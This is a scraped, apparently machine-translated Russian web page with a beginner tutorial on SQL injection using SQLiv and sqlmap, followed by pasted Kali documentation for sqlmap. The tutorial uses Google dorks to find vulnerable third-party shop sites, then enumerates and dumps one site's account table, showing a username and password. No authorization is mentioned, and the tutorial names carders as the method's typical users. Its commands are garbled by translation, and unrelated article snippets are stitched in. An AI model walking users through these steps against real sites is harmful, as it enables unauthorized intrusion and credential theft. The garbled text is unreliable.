Sqlmap kali linux использование

SQL-инъекция с помощью Kali Linux

Использование баз данных для управления различными хранилищами данных значительно возрастает при разработке веб-приложений с течением времени. База данных облегчает взаимодействие между пользователями и серверами. База данных (или в терминах системы управления базами данных, сокращенно DMBS) обеспечивает различные преимущества, включая ввод и хранение данных, поиск большой информации и простоту компиляции и группировки информации.

Но, помимо простоты и функций, которые предлагает база данных, а также множества вариантов использования баз данных в мире информации и технологий, особенно при разработке веб-сайтов. Постоянно пентестеры и хакеры пытаются найти брешь в безопасности базы данных. Это подтверждается отчетом, опубликованным исследователями Positive Technologies, исследовательскими центрами информационной безопасности в Европе, во втором квартале 2017 года в 10 основных атаках веб-приложений преобладали межсайтовые сценарии из 39.1% и SQL-инъекция 24.9%. В Positive Technologies заявили, что отчет за второй квартал не сильно отличается от первого квартала.

фигура 1. 10 основных атак на веб-приложения (источник ptsecurity.com)

Это и интересно, и тревожно, потому что в базе данных есть много информации, такой как учетные записи (администратор и пользователь), детали финансовой информации (например, кредитные карты, банковские счета и т. Д.).) и так далее. Кроме того, для выполнения атак с использованием SQL-инъекций не всегда требуются экспертные навыки инъекций, в том смысле, что дети могут это сделать. Поскольку существует множество бесплатных приложений, которые могут автоматически выполнять SQL-инъекцию, например, SQLMap. SQLMap — это приложение с открытым исходным кодом для действий по тестированию на проникновение, которое направлено на автоматическое проведение атак с использованием SQL-инъекций в дыру в безопасности базы данных. Здесь я покажу вам, как выполнить SQL-инъекцию с помощью SQLMap в Linux Kali. Никаких специальных возможностей не требуется, но они принесут больше пользы, если вы освоите язык сценариев или технологию баз данных SQL.

Это руководство рекомендуется для тех, кто плохо знаком с SQL-инъекцией в Kali Linux, просто для удовольствия или кто хочет увидеть, как работает SQL-инъекция. Не рекомендуется тем, кто уже является высококвалифицированным тестером на проникновение.

ВНЕДРЕНИЕ SQL С ИСПОЛЬЗОВАНИЕМ SQLMAP В KALI LINUX

Прежде чем мы выполним атаку инъекцией, мы, конечно, должны убедиться, что на сервере или цели есть дыра в безопасности базы данных. Чтобы найти дыры в безопасности базы данных, мы можем использовать несколько методов. Среди них Google dorking в основном используется хакерами и тестерами на проникновение. К счастью, есть инструмент, который может делать это автоматически. Но сначала мы должны установить его инструмент. Инструмент называется SQLiv (Сканер уязвимостей SQL-инъекций).

ШАГ 1: УСТАНОВИТЕ SQLiv на KALI LINUX

Введите в терминал следующие команды для установки SQLiv:

~ # git clone https: // github.com / Hadesy2k / sqliv.мерзавец
~ # cd sqliv && sudo python2 setup.py -i

Читайте также:  Magic mouse apple on linux

После установки SQLiv в Kali Linux он сохраняется в пути / usr / bin / sqliv. Который вы можете вызвать прямо из терминала, набрав sqliv. Теперь давайте посмотрим на возможности SQLIv.

ШАГ 2: ОБНАРУЖЕНИЕ УЯЗВИМОСТЕЙ ВНЕДРЕНИЯ SQL

Мы будем использовать Google Dorking, чтобы сканировать и находить дыры для SQL-инъекций в целях. Давайте возьмем простую глупость и позволим SQLiv сканировать каждую отдельную цель и искать уязвимость электронной коммерции в следующем элементе шаблона URL-адреса.php?id = ‘. Чтобы найти другие шаблоны, просто введите в Google «список придурков google».

~ # sqliv -d inurl: элемент.php?id = -e google -p 100

По умолчанию SQLiv будет сканировать первую страницу в поисковой системе, а в Google 10 сайтов на страницу. Таким образом, здесь мы определяем аргумент -п 100 просканировать 10 страниц (100 сайтов). Основываясь на приведенном выше задании, мы получили результат уязвимых URL-адресов, который выглядит следующим образом:

Мы обнаружили восемь из сотен просканированных URL-адресов, которые были признаны уязвимыми для атаки с использованием SQL-инъекции. Сохраните URL-адреса в текстовом редакторе для дальнейших шагов.

ШАГ 3: ВНЕДРЕНИЕ SQL С ИСПОЛЬЗОВАНИЕМ SQLMAP

Как только мы получили хотя бы одну уязвимую цель для SQL-инъекций, мы выполняем атаку с помощью SQLMap. Я беру один из них в качестве образца здесь. Во-первых, нам нужно раскрыть имя базы данных, внутри базы данных есть таблицы и столбцы, которые содержат данные.

Целевой URL: http: // www.мебель.com / item.php?id = 25

А. ПЕРЕЧИСЛЕНИЕ НАЗВАНИЯ БАЗЫ ДАННЫХ:

~ # sqlmap -u «ЦЕЛЕВОЙ URL» —dbs
-u / —url: целевой URL
—dbs: перечислить имена баз данных

Итак, скомпилированная команда будет выглядеть так:

~ # sqlmap -u «http: // www.мебель.com / item.php?id = 25 ”- дБ

Результат должен выглядеть следующим образом:

Мы получили название базы данных «мебель”.

B. ПЕРЕЧИСЛЕНИЕ ИМЕНИ ТАБЛИЦ

~ # sqlmap -u «ЦЕЛЕВОЙ URL» -D имя-базы данных —tables

Итак, скомпилированная команда будет такой:

~ # sqlmap -u «http: // www.мебель.com / item.php?id = 25 «-D acfurniture —tables

Результат должен быть таким:

Пока что можно сделать вывод, что расположение данных такое, сайт мебель.ком имеет две базы данных, мебель а также information_schema. База данных с именем мебель содержит четыре таблицы: category, product, product_hacked, а также настройки. Нет скомпрометированного имени таблицы, но давайте рассмотрим подробнее. Посмотрим, что внутри настройки Таблица. Внутри таблицы на самом деле есть столбцы, а данные.

C. ПЕРЕЧИСЛЕНИЕ КОЛОНК

~ # sqlmap -u «ЦЕЛЕВОЙ URL» -D имя-базы-данных -T имя-таблицы —columns

Итак, скомпилированная команда будет такой:

~ # sqlmap -u «http: // www.мебель.com / item.php?id = 25 «-D acfurniture -T settings —columns

Результат должен выглядеть так:

В настройки таблица состоит из 6 столбцов, и это на самом деле учетная запись. Давайте сбросим эти данные.

D. ДАМП ДАННЫЕ

~ # sqlmap -u «ЦЕЛЕВОЙ URL» -D имя-базы-данных -T имя-таблицы -C столбцы —dump

Итак, скомпилированная команда будет такой:

~ # sqlmap -u «http: // www.мебель.com / item.php?id = 25 «-D acfurniture -T settings -C имя пользователя, пароль —dump

Или вы также можете выгрузить все данные внутри таблицы, используя команду:

~ # sqlmap -u «http: // www.мебель.com / item.php?id = 25 «-D acfurniture -T settings —dump

Читайте также:  Sed linux точное совпадение

Результат должен выглядеть так:

Электронное письмо : [электронная почта защищена]
Имя пользователя : Красивый
Пароль : 9HPKO2NKrHbGmywzIzxUi

Хорошо, мы закончили выгрузку данных в базу данных с помощью SQL-инъекции. Наши следующие задачи — найти дверь или панель администратора, страница входа администратора на целевых сайтах. Перед этим убедитесь, что этот пароль (9HPKO2NKrHbGmywzIzxUi) зашифрован или нет, если да, то сначала нам нужно его расшифровать. Это еще одна тема, взлом и расшифровка.

Даже здесь мы на самом деле не взламываем целевой сайт, по крайней мере, мы много узнали о SQL-инъекции с помощью SQLMap в Kali Linux легко, и мы сбрасываем учетную запись с учетными данными. Этот метод используется в основном кардером (хакером, который ищет учетную запись кредитной карты на сайтах электронной коммерции), который нацелен на финансовые, банковские, магазины или сайты электронной коммерции, которые хранят информацию о кредитных картах их пользователей.

Как показать наложение OSD в полноэкранных приложениях и играх Linux

Игры

Игра в полноэкранные игры или использование приложений в полноэкранном режиме без отвлекающих факторов может отрезать вас от соответствующей системной.

Топ-5 карт для захвата игр

Игры

Все мы видели и любили потоковые игры на YouTube. PewDiePie, Jakesepticye и Markiplier — лишь некоторые из лучших игроков, которые заработали миллионы.

Как разработать игру в Linux

Игры

Десять лет назад не многие пользователи Linux могли бы предсказать, что их любимая операционная система однажды станет популярной игровой платформой д.

Свежие статьи об операционных системах. Множество интересных гайдов и полезных советов. Почувствуйте себя своим в мире современных технологий

Источник

Tool Documentation:

Attack the given URL ( -u “http://192.168.1.250/?p=1&forumaction=search” ) and extract the database names ( –dbs ):

[email protected]:~# sqlmap -u "http://192.168.1.250/?p=1&forumaction=search" --dbs ___ __H__ ___ ___[)]_____ ___ ___ |_ -| . ["] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 13:37:00 [13:37:00] [INFO] testing connection to the target URL 

Packages and Binaries:

sqlmap

sqlmap goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Installed size: 10.51 MB
How to install: sudo apt install sqlmap

sqlmap

Automatic SQL injection tool

[email protected]:~# sqlmap -h ___ __H__ ___ ___[.]_____ ___ ___ |_ -| . [,] | .'| . | |___|_ [']_|_|_|__,| _| |_|V. |_| https://sqlmap.org Usage: python3 sqlmap [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK Process Google dork results as target URLs Request: These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST (e.g. "id=1") --cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..") --random-agent Use randomly selected HTTP User-Agent header value --proxy=PROXY Use a proxy to connect to the target URL --tor Use Tor anonymity network --check-tor Check to see if Tor is used properly Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --dbms=DBMS Force back-end DBMS to provided value Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH.. SQL injection techniques to use (default "BEUSTQ") Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --passwords Enumerate DBMS users password hashes --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate Operating system access: These options can be used to access the back-end database management system underlying operating system --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC General: These options can be used to set some general working parameters --batch Never ask for user input, use the default behavior --flush-session Flush session files for current target Miscellaneous: These options do not fit into any other category --wizard Simple wizard interface for beginner users [!] to see full list of options run with '-hh' 
sqlmapapi

Automatic SQL injection tool, api server

[email protected]:~# sqlmapapi -h Usage: sqlmapapi [options] Options: -h, --help show this help message and exit -s, --server Run as a REST-JSON API server -c, --client Run as a REST-JSON API client -H HOST, --host=HOST Host of the REST-JSON API server (default "127.0.0.1") -p PORT, --port=PORT Port of the the REST-JSON API server (default 8775) --adapter=ADAPTER Server (bottle) adapter to use (default "wsgiref") --username=USERNAME Basic authentication username (optional) --password=PASSWORD Basic authentication password (optional) 

Источник

Оцените статью
Adblock
detector